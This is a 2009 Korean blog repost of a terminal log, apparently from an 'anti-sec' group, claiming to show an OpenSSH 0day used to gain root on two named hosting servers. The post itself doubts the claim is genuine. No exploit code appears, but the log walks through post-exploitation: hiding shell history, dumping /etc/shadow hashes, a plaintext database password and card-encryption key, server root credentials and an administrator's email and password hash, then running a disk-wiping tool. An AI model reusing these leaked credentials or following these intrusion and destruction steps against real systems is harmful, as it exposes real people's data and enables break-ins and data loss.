0day openssh remote exploit
Posted 2009/07/07 11:40 by silverbugExploit은 아직 공개 되지 않고, 테스트 결과만 공개된 사항이라, 사실인지는.... 모르겠습니다만.. 실제 Exploit이 공개 된다면 상당한 파장(웜등으로 인해)이 예상되네요..
redhat enterprise linux 5.3의 openssh 4.3에서 테스트한 결과입니다.
anti-sec:~/pwn# ./map ssanz.net
IP: 66.197.143.133 ( osiris.ssanz.net )
WWW: Apache/2.2.11
SSH: SSH-2.0-OpenSSH_4.3
IP: 66.197.204.101 ( devil.ssanz.net )
WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5
mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
SSH: SSH-2.0-OpenSSH_4.3
anti-sec:~/pwn# cd xpl/
anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.143.133 -p 22
[+] 0wn0wn – anti-sec group
[+] Target: 66.197.143.133
[+] SSH Port: 22
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
sh-3.2# export HISTFILE=/dev/null
sh-3.2# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# uname -a
Linux osiris.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata
#1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
더보기
sh-3.2# head -n1 /etc/shadow
root:$1$t4e0hufX$UH4Q5jTj93EEAODNrSaWO/:14412:0:99999:7:::
sh-3.2# w
03:43:43 up 7 days, 54 min, 1 user, load average: 9.01, 9.78,
10.73
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 125.238.144.224 20:17 7:26m 13:18 13:18 htop
sh-3.2# pwd
/root
sh-3.2# ls -la
total 3008
drwxr-x— 24 root root 4096 Jul 4 03:43 .
drwxr-xr-x 27 root root 4096 Jun 27 02:49 ..
- -rw——- 1 root root 957 Jun 13 07:24 .accesshash
- -rw——- 1 root root 1012 Jun 1 10:39 anaconda-ks.cfg
- -rw——- 1 root root 15460 Jul 3 23:38 .bash_history
- -rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
- -rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
- -rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
drwxrwxrwx 3 therockm therockm 4096 Jun 5 07:26 bwm-ng-0.6
- -rw-r–r– 1 root root 141564 Mar 1 2007 bwm-ng-
0.6.tar.gz
drwxr-xr-x 3 root root 4096 Nov 15 2006 cmm
- -rw-r–r– 1 root root 18656 Feb 28 11:32 cmm.tgz
drwxr-xr-x 3 root root 4096 Nov 5 2006 cmq
- -rw-r–r– 1 root root 14507 Oct 10 2008 cmq.tgz
drwxr-xr-x 4 root root 4096 Jun 1 14:33 .cpanel
drwxr-xr-x 4 root root 4096 Jun 1 17:10 cpanel3-skel
drwx—— 3 root root 4096 Jun 1 13:50 .cpobjcache
drwxr-xr-x 10 root root 4096 Apr 13 16:17 csf
- -rw-r–r– 1 root root 430121 May 15 12:07 csf.tgz
- -rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
drwx—— 2 root root 4096 Jun 1 13:54 .elinks
- -rw-r–r– 1 root root 1176672 Jul 4 03:40 error_log
- -rw-r–r– 1 root root 16 Jun 3 08:34 .forward
drwx—— 3 root root 4096 Jun 1 10:39 .gconf
drwx—— 2 root root 4096 Jun 1 10:39 .gconfd
drwxr-xr-x 4 root root 4096 Jun 10 23:42 .gem
drwx—— 2 root root 4096 Jun 1 13:55 .gnupg
drwxrwxrwx 5 theweath theweath 4096 Jun 1 17:13 htop-0.8.1
- -rw-r–r– 1 root root 414870 Sep 23 2008 htop-
0.8.1.tar.gz
- -rw-r–r– 1 root root 561 Jun 27 02:48 .htoprc
- -rw-r–r– 1 root root 8144 Jun 6 19:23 index.html
- -rw-r–r– 1 root root 4246 Jun 1 10:39
install.log.syslog
drwxr-xr-x 6 500 root 4096 Sep 13 2005 iptraf-3.0.0
- -rw-r–r– 1 root root 0 Jun 27 09:21 iptraf-
3.0.0.tar.gz
- -rw-r–r– 1 root root 0 Jun 27 09:22 iptraf-
3.0.0.tar.gz.1
- -rw-r–r– 1 root root 0 Jun 27 09:24 iptraf-
3.0.0.tar.gz.2
- -rw-r–r– 1 root root 575169 Jun 27 09:26 iptraf-
3.0.0.tar.gz.3
drwx—— 6 root root 4096 Jun 1 14:21 .MirrorSearch
- -rw——- 1 root root 61 Jun 12 21:04 .my.cnf
- -rw——- 1 root root 139 Jul 3 10:51 .mysql_history
- -rwxrwxrwx 1 root root 38688 Dec 1 2008 mysqltuner.pl
- -rw-r–r– 1 root root 264 Jul 2 21:43 .pearrc
drwxr-xr-x 2 root root 4096 Jun 1 17:04 public_ftp
drwxr-xr-x 3 root root 4096 Jun 1 17:04 public_html
- -rw——- 1 root root 1024 Jun 7 19:50 .rnd
drwx—— 3 root root 4096 Jun 1 14:29 .spamassassin
drwx—— 2 root root 4096 Jun 2 06:41 .ssh
- -rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
drwxr-xr-x 3 root root 4096 Jun 7 21:54 tmp
- -rw——- 1 root root 0 Jun 7 22:01 .trustwavereqs
drw——- 2 root root 4096 Jun 3 08:18 whmrbackups
drw——- 3 root root 4096 Jun 10 08:25 whmrcorebackups
sh-3.2# cat .bash_history
htop
htop
p
htop
tail -f /var/log/secure
tail -f /var/log/secure
[snip]
nano highperformance.conf
service httpd restart
nano highperformance.conf
service httpd restart
nano highperformance.conf
nano httpd.conf
nano php.conf
ls
nano modsec2.conf
ls
[snip]
nano visit4cash.net.conf
cd ..
[snip]
netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n ps -aux|grep -i HTTP|wc -l w bwm-ng [snip] netstat -plan|grep :80|awk {.print $5.}|cut -d: -f 1|sort|uniq -
c|sort -n
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -
c|sort -n
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -
c|sort -n
netstat -ntu | awk .{print $5}. | cut -d: -f1 | sort | uniq -c | sort -n netstat -an | awk ‘{print $4}’ | awk -F”:” ‘{print $2}’ | sort -n -u netstat -nat | awk ‘{print $6}’ | sort | uniq -c | sort -n netstat -nat |grep 202.54.1.10 | awk ‘{print $6}’ | sort | uniq -c
| sort -n
netstat -atun | awk ‘{print $5}’ | cut -d: -f1 | sed -e ‘/^$/d’
|sort | uniq -c | sort -n
[snip]
/sbin/iptables -A INPUT -i eth0 -p tcp –tcp-flags ALL ACK,RST,SYN,FIN -j DROP /sbin/iptables -A INPUT -i eth0 -p tcp –tcp-flags SYN,FIN SYN,FIN – j DROP /sbin/iptables -A INPUT -i eth0 -p tcp –tcp-flags SYN,RST SYN,RST – j DROP [snip] service cups stop chkconfig cups off service nfslock stop chkconfig nfslock off service rpcidmapd stop chkconfig rpcidmapd off service bluetooth stop chkconfig bluetooth off service anacron stop chkconfig anacron off service avahi-daemon stop chkconfig avahi-daemon off service hidd stop chkconfig hidd off service pcscd stop chkconfig pcscd off [snip]
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-
iso
screen wget http://www.remote-exploit.org/cgi-
bin/fileget?version=bt4-prefinal-iso
htop
screen wget http://www.remote-exploit.org/cgi-
bin/fileget?version=bt4-beta-iso
[snip]
wget http://fullhide.info/backup-6.24.2009_18-13-16_fullhide.tar.gz
htop
[snip]
wget ftp://iptraf.seul.org/pub/iptraf/iptraf-3.0.0.tar.gz
wget ftp://the.wiretapped.net/pub/security/network-
monitoring/iptraf/iptraf-3.0.00.tar.gz
[snip]
wget http://www.logview.org/logview-install
chmod +x logview-install
./logview-install
rm -rf logview-install
sh-3.2# grep sec /etc/userdomains
affiliatesecrets.wecloak.info: wecloaki
infosecawareness.info: andlyssa
secproxy.info: secproxy
infosecawareness.andly.ssanz.net: andlyssa
greycloud.nakedinsects.com: greyclou
serversecuritynz.com: forumz
orac.nakedinsects.com: oracnz
infernal.nakedinsects.com: infernal
nakedinsects.com: ni
fluffy.nakedinsects.com: fluffy
quickclix.orac.nakedinsects.com: oracnz
seco39.ssanz.net: secossan
sh-3.2# lastlog | grep -v Never
Username Port From Latest
root pts/1 125.238.144.224 Fri Jul 3 20:27:03 -
0400 2009
simmobim pts/0 118.69.80.114 Fri Jun 12 00:22:04 -
0400 2009
mattss pts/1 118.90.48.0 Sun Jun 21 04:44:58 -
0400 2009
etasmtco pts/0 189.31.24.129 Sat Jun 20 10:14:51 -
0400 2009
sh-3.2# cd ~billing
sh-3.2# ls -la
total 301252
drwx–x–x 15 billing billing 4096 Jun 28 02:08 .
drwx–x–x 737 root root 20480 Jul 4 00:37 ..
lrwxrwxrwx 1 billing billing 33 Jun 2 01:58 access-logs ->
/usr/local/apache/domlogs/billing
- -rw——- 1 billing billing 87744924 Jun 14 12:33 backup-
6.14.2009_12-32-41_billing.tar.gz
- -rw——- 1 billing billing 92931478 Jun 28 02:08 backup-
6.28.2009_02-06-29_billing.tar.gz
- -rw——- 1 billing billing 84475934 Jun 3 06:33 backup-
6.3.2009_06-32-54_billing.tar.gz
- -rw——- 1 billing billing 42341015 May 31 21:42 backup-
billing9912.tar.gz
- -rw-r–r– 1 billing billing 24 May 27 2008 .bash_logout
- -rw-r–r– 1 billing billing 176 May 27 2008 .bash_profile
- -rw-r–r– 1 billing billing 124 May 27 2008 .bashrc
- -rw——- 1 billing billing 17 May 27 2008 .contactemail
drwxr-xr-x 5 billing billing 4096 May 8 02:48 .cpanel
- -rw-r—– 1 billing billing 0 Apr 4 06:32 cpbackup-
exclude.conf
drwxr-xr-x 2 billing billing 4096 Jun 2 01:57 cpmove.psql
drwxr-xr-x 3 billing billing 4096 Nov 12 2008
cpmove.psql.1240007789
drwxr-xr-x 2 billing billing 4096 Apr 16 23:24
cpmove.psql.1243922290
- -rw-r–r– 1 billing billing 532304 Jul 4 03:45 error_log
drwxr-x— 4 billing mail 4096 Jan 19 21:39 etc
drwxr-x— 2 billing nobody 4096 May 27 2008 .htpasswds
- -rw-r–r– 1 billing billing 7 Nov 12 2008 .lang
- -rw——- 1 billing billing 15 Jun 28 02:07 .lastlogin
drwxrwx— 10 billing billing 4096 Jul 2 21:43 mail
drwxr-xr-x 4 billing billing 4096 Nov 12 2008 .mozilla
drwxr-xr-x 3 billing billing 4096 Apr 29 2008 public_ftp
drwxr-x— 24 billing nobody 4096 Jun 28 02:55 public_html
drwx—— 4 billing billing 4096 Jun 7 21:53 ssl
drwxr-xr-x 7 billing billing 4096 Feb 25 17:59 tmp
drwx—— 2 billing billing 4096 May 27 2008 .trash
lrwxrwxrwx 1 billing billing 11 Jun 2 01:58 www ->
public_html
- -rw-r–r– 1 billing billing 658 May 27 2008 .zshrc
sh-3.2# cd www/
sh-3.2# ls
admin banned.php configuressl.php
domainchecker.php init.php logout.php
postinfo.html templates viewticket.php whois.php
affiliates.php billing contact.php
downloads installmingchowping modules
_private templates_c _vti_bin
aff.php cart.php creditcard.php
downloads.php knowledgebase.php networkissues.php
register.php tutorials.php _vti_cnf
announcements.php cgi-bin dbconnect.php
htaccess.txt lang networkissuesrss.php
serverstatus.php upgrade _vti_inf.html
announcementsrss.php clientarea.php display.php
images libs order.php
status upgrade.php _vti_log
announcements.xml configuration.php dl.php
includes link.php passwordreminder.php
submitticket.php viewemail.php _vti_pvt
attachments configuration.php.new dologin.php
index.php login.php pipe
supporttickets.php viewinvoice.php _vti_txt
sh-3.2# cat configuration.php
<?php
$license=”93881365561d”;
$db_host = “localhost”;
$db_username = “billing_billusr”;
$db_password = “X2qL6:qWCCb6″;
$db_name = “billing_billing”;
$cc_encryption_hash =
“57jR9sVyPKcDvZ4Ppy4I56sjYLI6mmEjhPQJ1sEAqBw7O952JlkTlrAbzLLmTx9K”;
$templates_compiledir = “templates_c/”;
?>
sh-3.2# mysql
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 11021136
Server version: 5.0.81-community MySQL Community Edition (GPL)
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.
mysql> use billing_billing;
Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+—————————-+
| Tables_in_billing_billing |
+—————————-+
| mod_ipmanager |
| mod_ipmonitor |
| tblaccounts |
| tblactivitylog |
| tbladdons |
| tbladminlog |
| tbladminperms |
| tbladminroles |
| tbladmins |
| tbladminsecurityquestions |
| tblaffiliates |
| tblaffiliatesaccounts |
| tblaffiliateshistory |
| tblaffiliatespending |
| tblaffiliateswithdrawals |
| tblannouncements |
| tblbannedemails |
| tblbannedips |
| tblbillableitems |
| tblbrowserlinks |
| tblcalendar |
| tblcancelrequests |
| tblclientgroups |
| tblclients |
| tblconfiguration |
| tblcontacts |
| tblcredit |
| tblcurrencies |
| tblcustomfields |
| tblcustomfieldsvalues |
| tbldomainpricing |
| tbldomains |
| tbldomainsadditionalfields |
| tbldownloadcats |
| tbldownloads |
| tblemails |
| tblemailtemplates |
| tblfraud |
| tblgatewaylog |
| tblhosting |
| tblhostingaddons |
| tblhostingconfigoptions |
| tblinvoiceitems |
| tblinvoices |
| tblknowledgebase |
| tblknowledgebasecats |
| tblknowledgebaselinks |
| tbllinks |
| tblnetworkissues |
| tblnotes |
| tblorders |
| tblpaymentgateways |
| tblpricing |
| tblproductconfiggroups |
| tblproductconfiglinks |
| tblproductconfigoptions |
| tblproductconfigoptionssub |
| tblproductgroups |
| tblproducts |
| tblpromotions |
| tblquoteitems |
| tblquotes |
| tblregistrars |
| tblservers |
| tblsslorders |
| tbltax |
| tblticketbreaklines |
| tblticketdepartments |
| tblticketescalations |
| tblticketlog |
| tblticketmaillog |
| tblticketnotes |
| tblticketpredefinedcats |
| tblticketpredefinedreplies |
| tblticketreplies |
| tbltickets |
| tblticketspamfilters |
| tbltodolist |
| tblupgrades |
| tblwhoislog |
+—————————-+
80 rows in set (0.00 sec)
mysql> select name,ipaddress,hostname,username,password from
tblservers;
+————–+—————-+——————+———-+—–
- ——————————————————————–
- -+
| name | ipaddress | hostname | username |
password
|
+————–+—————-+——————+———-+—–
- ——————————————————————–
- -+
| Osiris | 66.197.143.133 | Osiris.ssanz.net | ssanz |
J4WILwNJpxR0KhyuPspLOT37zLzLrZ1wyqctabXg3co=
|
| Osiris-Radio | 66.197.143.133 | Osiris.ssanz.net | root |
+V876e3z7tGn9HXEcOG1TJVPaSsGbj31MnsZ2lw52buNutqcpfBhrPVsKdDssqrh7eDF
8g== |
| Devil | 66.197.204.101 | devil.ssanz.net | root |
n/a/WSvQJp/++la5CREbl9QijpppzdxP0GjijQRXst2nag9E9PuTVrRO3A==
|
+————–+—————-+——————+———-+—–
- ——————————————————————–
- -+
3 rows in set (0.00 sec)
mysql> select firstname,lastname,email,username,password from
tbladmins;
+———–+———-+—————–+———-+—————
- ——————-+
| firstname | lastname | email | username | password
|
+———–+———-+—————–+———-+—————
- ——————-+
| Logan | Douglas | Logan@ssanz.net | Admin |
c6df529826cf16ac5bedb424d8ac972b |
+———–+———-+—————–+———-+—————
- ——————-+
1 row in set (0.06 sec)
mysql> quit
Bye
sh-3.2# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 2.0G 477M 1.4G 26% /
/dev/sda8 875G 147G 684G 18% /home
/dev/sda3 9.7G 6.8G 2.5G 74% /usr
/dev/sda2 9.7G 7.0G 2.3G 76% /var
/dev/sda1 99M 23M 72M 24% /boot
/dev/sda6 996M 64M 881M 7% /tmp
tmpfs 3.9G 0 3.9G 0% /dev/shm
/dev/sdb1 459G 163G 273G 38% /backup
sh-3.2# ./wipe
sh-3.2# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 64Z 64Z 1.5G 100% /
/dev/sda8 64Z 64Z 729G 100% /home
/dev/sda3 64Z 64Z 3.0G 100% /usr
/dev/sda2 64Z 64Z 3.0G 100% /var
/dev/sda1 16Z 16Z 0 100% /boot
/dev/sda6 64Z 64Z 933M 100% /tmp
tmpfs 3.9G 0 3.9G 0% /dev/shm
/dev/sdb1 64Z 64Z 296G 100% /backup
sh-3.2# exit
exit
- ———————————–
osiris [ DOWN ]
devil [ UP ]
- ———————————–
anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.204.101 -p 22
[+] 0wn0wn – anti-sec group
[+] Target: 66.197.204.101
[+] SSH Port: 22
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
sh-3.2# export HISTFILE=/dev/null
sh-3.2# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# uname -a
Linux devil.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2# head -n1 /etc/shadow
root:$1$BitobdhB$SAscpWG4O51UZQzxpBxbI1:14407:0:99999:7:::
sh-3.2# w
04:10:20 up 4 days, 12:11, 1 user, load average: 3.25, 2.09, 1.68
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 125.238.144.224 20:18 7:51m 6:38 6:38 htop
sh-3.2# pwd
/root
sh-3.2# ls -la
total 1232
drwxr-x— 23 root root 4096 Jul 4 04:06 .
drwxr-xr-x 25 root root 4096 Jun 29 14:33 ..
- -rw——- 1 root root 957 Jun 13 05:20 .accesshash
- -rw——- 1 root root 937 Jun 12 00:01 anaconda-ks.cfg
- -rw——- 1 root root 7258 Jun 30 10:03 .bash_history
- -rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
- -rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
- -rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
drwxrwxrwx 3 1000 1000 4096 Jun 12 04:45 bwm-ng-0.6
- -rw-r–r– 1 root root 141564 Mar 1 2007 bwm-ng-0.6.tar.gz
drwxr-xr-x 3 root root 4096 Nov 5 2006 cmq
- -rw-r–r– 1 root root 14507 Oct 10 2008 cmq.tgz
drwxr-xr-x 4 root root 4096 Jun 12 02:51 .cpanel
drwxr-xr-x 4 root root 4096 Jun 12 03:26 cpanel3-skel
drwx—— 3 root root 4096 Jun 12 00:17 .cpobjcache
drwxr-xr-x 2 root root 4096 Aug 21 2006 cse
- -rw-r–r– 1 root root 12207 Oct 10 2008 cse.tgz
drwxr-xr-x 10 root root 4096 Jun 5 05:05 csf
- -rw-r–r– 1 root root 431490 Jun 5 10:52 csf.tgz
- -rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
drwx—— 2 root root 4096 Jun 12 01:51 .elinks
- -rw-r–r– 1 root root 16 Jun 13 15:33 .forward
drwx—— 3 root root 4096 Jun 11 23:59 .gconf
drwx—— 2 root root 4096 Jun 11 23:59 .gconfd
drwxr-xr-x 4 root root 4096 Jun 12 04:29 .gem
drwx—— 2 root root 4096 Jun 12 01:53 .gnupg
drwxrwxrwx 6 1002 1002 4096 Jun 12 04:24 htop-0.8.1
- -rw-r–r– 1 root root 414870 Sep 23 2008 htop-0.8.1.tar.gz
- -rw-r–r– 1 root root 561 Jun 12 23:31 .htoprc
- -rw-r–r– 1 root root 4239 Jun 12 00:01 install.log.syslog
drwx—— 6 root root 4096 Jun 12 02:33 .MirrorSearch
- -rw——- 1 root root 37 Jun 12 02:11 .my.cnf
drwxr-xr-x 3 1000 1000 4096 Jun 12 05:42 mytop-1.6
- -rw-r–r– 1 root root 19720 Feb 16 2007 mytop-1.6.tar.gz
- -rw-r–r– 1 root root 264 Jun 23 00:23 .pearrc
drwxr-xr-x 2 root root 4096 Jun 12 03:21 public_ftp
drwxr-xr-x 3 root root 4096 Jun 12 03:21 public_html
- -rw——- 1 root root 1024 Jun 12 02:50 .rnd
drwx—— 3 root root 4096 Jun 12 02:41 .spamassassin
drwx—— 2 root root 4096 Jun 22 09:11 .ssh
- -rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
drwxr-xr-x 3 root root 4096 Jun 12 02:40 tmp
drwxr-xr-x 2 root root 4096 Jun 16 19:23 .wapi
sh-3.2# cat .bash_history
sh hninst.sh
passwd
fdisk -l
exit
w
history
screen -ls
screen -r 2785.pts-0.devil
exit
wget http://merovingian.net.nz/htop-0.8.1.tar.gz
[snip]
csf -a 125.238.144.110
exit
cd /home
ls
wget http://visit4cash.net/backup-6.12.2009_06-46-12_visit4ca.tar.gz
[snip]
wget http://visit4cash.net/mainfiles.tar.gz
mv mainfiles.tar.gz /home/visit4ca/public_html cd /home cd visit4ca cd public_html ls tar zxvf mainfiles.tar.gz [snip] csf -d 89.165.50.38 netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.38.206.233 csf –restart netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n csf -d 118.94.59.33 netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n [snip] screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Live/
i686/Fedora-11-i686-Live.iso
screen wget
http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedor
a/x86_64/iso/Fedora-11-x86_64-DVD.iso
screen wget
http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedor
a/x86_64/iso/Fedora-11-x86_64-netinst.iso
sh-3.2# cat /etc/userdomains
advertising.ssanz.net: adserver
forums.visit4cash.net: forumsv4
megacashzone.com: megacash
visit4cash.net: visit4ca
seanone.com: seanonec
backup2.ssanz.net: backup2
*: nobody
sh-3.2# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda3 31G 7.5G 22G 26% /
/dev/sdb1 452G 35G 394G 9% /home
/dev/sda1 99M 23M 72M 24% /boot
tmpfs 495M 4.0K 495M 1% /dev/shm
/usr/tmpDSK 485M 14M 446M 3% /tmp
sh-3.2# who
root pts/0 2009-07-03 20:18 (125.238.144.224)
sh-3.2# ./wipe
sh-3.2# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda3 64Z 64Z 24G 100% /
/dev/sdb1 64Z 64Z 417G 100% /home
/dev/sda1 16Z 16Z 77M 100% /boot
tmpfs 495M 4.0K 495M 1% /dev/shm
/usr/tmpDSK 485M 14M 446M 3% /tmp
sh-3.2# exit
exit
출처 : http://baoz.net/0day-openssh-remote-exploit/
Trackback URL : http://hacker.or.kr/trackback/28
Search
Tag Cloud
Categories
Recent Posts
Recent Comments
Recent Trackbacks
Calendar
Bookmarks
- TOTAL 66,879 HIT
- TODAY 1 HIT
- YESTERDAY 23 HIT
Powered by Daum and Tattertools. | Tiskin Design